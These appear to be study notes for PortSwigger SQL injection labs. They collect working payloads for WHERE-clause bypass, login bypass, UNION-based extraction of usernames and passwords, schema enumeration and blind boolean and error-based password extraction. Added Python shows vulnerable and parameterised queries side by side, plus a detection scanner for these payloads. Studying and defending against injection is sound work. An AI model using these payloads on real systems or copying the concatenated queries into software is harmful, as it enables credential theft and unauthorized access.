https://portswigger.net/web-security/sql-injection/cheat-sheet
SQL Injection in Where Clause
- It retrieves all the data because the condition 1=1 is always true
Pets'OR 1=1--
SELECT * FROM products WHERE category='Pets'OR 1=1--'
- The -- comments out the original closing quote, so the WHERE clause becomes category='Pets' OR 1=1.
- It bypasses the need to enter the password during authentication.
- Include this in the username field
Administrator'--
SELECT * FROM users WHERE username='Administrator'--' AND password='test123'
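As an added example (not from the original notes or the PortSwigger labs), the two injections above reproduced against an in-memory SQLite database, with each string-concatenated query next to its parameterised counterpart; the table contents are constructed.

```python
import sqlite3

# Constructed sample data (not the lab's tables). Passwords are kept in
# plaintext only to keep the demo short.
PRODUCTS = [("Pets", "Dog Bed"), ("Pets", "Cat Tree"), ("Gifts", "Mug"), ("Accessories", "Belt")]
USERS = [("Administrator", "s3cret-admin"), ("wiener", "peter")]

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (category TEXT, name TEXT)")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?)", PRODUCTS)
    con.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return con

def vulnerable_search(con, category):
    # Concatenation: the input becomes part of the SQL text, so Pets' OR 1=1--
    # closes the literal, adds an always-true condition and comments out the rest.
    sql = "SELECT name FROM products WHERE category='" + category + "'"
    return [row[0] for row in con.execute(sql)]

def safe_search(con, category):
    # Bound parameter: the value travels separately from the statement, so the
    # quote, OR 1=1 and -- are only compared against the category column.
    rows = con.execute("SELECT name FROM products WHERE category=?", (category,))
    return [row[0] for row in rows]

def vulnerable_login(con, username, password):
    # Administrator'-- comments out the password check entirely.
    sql = ("SELECT username FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None

def safe_login(con, username, password):
    row = con.execute("SELECT username FROM users WHERE username=? AND password=?",
                      (username, password)).fetchone()
    return row[0] if row else None
```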
SQL injection UNION attacks
When an application is vulnerable to SQL injection, and the results of the query are returned within the application’s responses, you can use the UNION keyword to retrieve data from other tables within the database. This is commonly known as a SQL injection UNION attack.
The UNION keyword enables you to execute one or more additional SELECT queries and append the results to the original query. For example:
SELECT a, b FROM table1 UNION SELECT c, d FROM table2
For a UNION query to work, two key requirements must be met:
- The individual queries must return the same number of columns.
- The data types in each column must be compatible between the individual queries.
To carry out a SQL injection UNION attack, make sure that your attack meets these two requirements. This normally involves finding out:
- How many columns are being returned from the original query.
- Which columns returned from the original query are of a suitable data type to hold the results from the injected query.
- Determine the number of columns using the following:
' ORDER by 1--
- Second method of determining the number of columns:
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
Oracle Specific Syntax
On Oracle, every SELECT query must use the FROM keyword and specify a valid table. There is a built-in table on Oracle called dual which can be used for this purpose. So the injected queries on Oracle would need to look like:
' UNION SELECT NULL FROM DUAL--
The payloads described use the double-dash comment sequence -- to comment out the remainder of the original query following the injection point.
On MySQL, the double-dash sequence must be followed by a space. Alternatively, the hash character # can be used to identify a comment.
Find Columns with useful data types
- Once we know the number of columns, we need a way to identify which columns store string data.
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
Using a SQL injection UNION attack to retrieve interesting data
Postgres
Payload taken from the Pentest Monkey cheat sheet for the Postgres database:
category=Accessories'Union select 1,usename,3 FROM pg_user--
- Get username and password from table users. Both the columns are of string type.
category=Accessories'Union select username,password FROM users--
SELECT * FROM products WHERE category='Accessories'Union select username, password FROM users--'
Retrieving multiple values within a single column
Postgres
Accessories'Union select NULL,username || ':' || password FROM users--
Oracle
' UNION SELECT username || '~' || password FROM users--
Querying the database type and version
Postgres
SELECT version()
category=Accessories'Union select NULL,version(),NULL--
- This is what is happening behind the scenes:
SELECT * FROM products WHERE category='Accessories'Union select NULL,version(),NULL--'
Oracle
SELECT * FROM v$version
MySQL
SELECT @@version
Gifts'Union select NULL,@@version-- +
- The trailing + is a URL-encoded space after --, which MySQL requires for the comment to be recognised.
MSSQL
SELECT @@version
Gifts'Union select NULL,@@version-- +
Listing the contents of the database
SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'Users'
Postgres
- List the current database
category=Accessories'Union+select+current_database(),NULL--
- List all databases
category=Accessories'Union+select+datname,NULL+FROM+pg_database--
- List table names
category=Accessories'Union+select+table_name,NULL+FROM+information_schema.tables--
- List column names from the table selected above
category=Accessories'Union+select+column_name,NULL+FROM+information_schema.columns+Where+table_name%3d'users_ovdpzj'--
- List the contents of the table using those columns
category=Accessories'Union+select+username_xcmefk,password_jjerqi+FROM+users_ovdpzj--
- Result: administrator / e63exorvzrog4hbx9od9
SQL Injection Blind
The results of the query are not returned in the application's responses.
Exploiting blind SQL injection by triggering conditional responses
…xyz' AND '1'='1
…xyz' AND '1'='2
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm
- Verify that the administrator user exists
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
- Verify the password length
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
- Brute force the password one character at a time
AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username%3d'administrator'),5,1)%3d'n
- Use an Intruder cluster bomb attack with two payload positions: the character offset (5 above) as a simple list of numbers, and the guessed character (n above) as a simple list of letters and digits, then start the attack.
SQL Injection Error Based
Exploiting blind SQL injection by triggering conditional errors
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
The second payload causes a division-by-zero error because 1=1 is true, so whether an error occurs reveals whether the condition holds.
xyz' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') THEN 1/0 ELSE 'a' END FROM Users)='a
Oracle
TrackingId=19ldBxEHyw2SeqJD'AND+(SELECT+CASE+WHEN+(1=0)THEN+TO_CHAR(1/0)+ELSE+'b'+END+FROM+DUAL)%3d'b--
TrackingId=19ldBxEHyw2SeqJD'AND+(SELECT+CASE+WHEN+(1=1)THEN+TO_CHAR(1/0)+ELSE+'b'+END+FROM+DUAL)%3d'b--
TrackingId=19ldBxEHyw2SeqJD'AND+(SELECT+CASE+WHEN+(username='Administrator')THEN+TO_CHAR(1/0)+ELSE+'b'+END+FROM+Users)%3d'b--
- Payloads using the Oracle string concatenation operator ||:
TrackingId=19ldBxEHyw2SeqJD'||(SELECT ''+from+dual)||'
TrackingId=19ldBxEHyw2SeqJD'||(SELECT CASE+WHEN+(1%3d1)+THEN+TO_CHAR(1/1)+ELSE+'b'+END+From+Dual)||'
- Verify that the username exists: if the response is an error, the subquery executed successfully, so the user exists.
19ldBxEHyw2SeqJD'||(SELECT CASE+WHEN+(1%3d1)+THEN+TO_CHAR(1/0)+ELSE+''+END+From+Users+where+username%3d'administrator')||'
- Get the length of the password
19ldBxEHyw2SeqJD'||(SELECT CASE+WHEN+(1%3d1)+THEN+TO_CHAR(1/0)+ELSE+''+END+From+Users+where+username%3d'administrator'+AND+LENGTH(password)>100)||'
- Get the first character of the password
- An error means the condition is true
TrackingId=19ldBxEHyw2SeqJD'||(SELECT CASE+WHEN+(1%3d1)+THEN+TO_CHAR(1/0)+ELSE+''+END+From+Users+where+username%3d'administrator'+AND+SUBSTR(password,1,1)%3d'2')||'
- Use this with a cluster bomb attack now, as above
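As an added detection example (not part of the original notes), a log scanner that tags the payload families from the UNION section and from the blind and error-based sections above, and flags clients that send repeated character-guessing probes; the log line format and the sample lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures for the payload families shown on this page, applied to the
# URL-decoded value so that +, %3d and case variations do not hide them.
SIGNATURES = {
    "order_by_probe": re.compile(r"'\s*ORDER\s+BY\s+\d+\s*(--|#)", re.I),
    "union_select":   re.compile(r"'\s*UNION\s+SELECT\b", re.I),
    "union_null":     re.compile(r"UNION\s+SELECT\s+NULL\b", re.I),
    "schema_enum":    re.compile(r"information_schema\.|pg_database|pg_user|v\$version", re.I),
    "version_probe":  re.compile(r"version\(\)|@@version", re.I),
    "blind_char":     re.compile(r"\bSUBSTR(ING)?\s*\(.*?\)\s*[=<>]\s*'", re.I),
    "error_probe":    re.compile(r"CASE\s+WHEN\b.*\b1\s*/\s*0\b", re.I),
}

def classify(raw_value):
    """Signature names that match one URL-encoded parameter or cookie value."""
    decoded = unquote_plus(raw_value)
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}

def scan_log(lines, blind_threshold=3):
    """Tag each line; clients sending at least blind_threshold blind probes are
    reported separately, since extraction needs one request per character guess."""
    hits, blind_per_client = [], Counter()
    for line in lines:
        parts = line.split(" ", 2)        # constructed format, see SAMPLE_LOG
        if len(parts) != 3:
            continue
        client, path, cookie = parts
        tags = classify(path) | classify(cookie)
        if tags:
            hits.append((client, sorted(tags)))
        if tags & {"blind_char", "error_probe"}:
            blind_per_client[client] += 1
    suspects = sorted(c for c, n in blind_per_client.items() if n >= blind_threshold)
    return hits, suspects

# Constructed sample lines "<client> <request-path> <cookie>" (not real traffic).
SAMPLE_LOG = [
    "10.0.0.5 /filter?category=Gifts TrackingId=abc",
    "10.0.0.9 /filter?category=Gifts'+ORDER+by+1-- TrackingId=abc",
    "10.0.0.9 /filter?category=Gifts'+UNION+SELECT+NULL,NULL-- TrackingId=abc",
    "10.0.0.9 /filter?category=Gifts'+Union+select+NULL,@@version--+ TrackingId=abc",
    "10.0.0.9 /filter?category=Accessories'Union+select+table_name,NULL+FROM+information_schema.tables-- TrackingId=abc",
    "10.0.0.7 /home TrackingId=xyz'+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username%3d'administrator'),1,1)%3d'a",
    "10.0.0.7 /home TrackingId=xyz'+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username%3d'administrator'),1,1)%3d'b",
    "10.0.0.7 /home TrackingId=xyz'+AND+(SELECT+CASE+WHEN+(1%3d1)+THEN+1/0+ELSE+'a'+END)%3d'a",
]
```

A single tagged request is a probe worth reviewing; a client crossing the blind threshold is the signature of the per-character Intruder run, which is the point at which blocking or session invalidation should kick in.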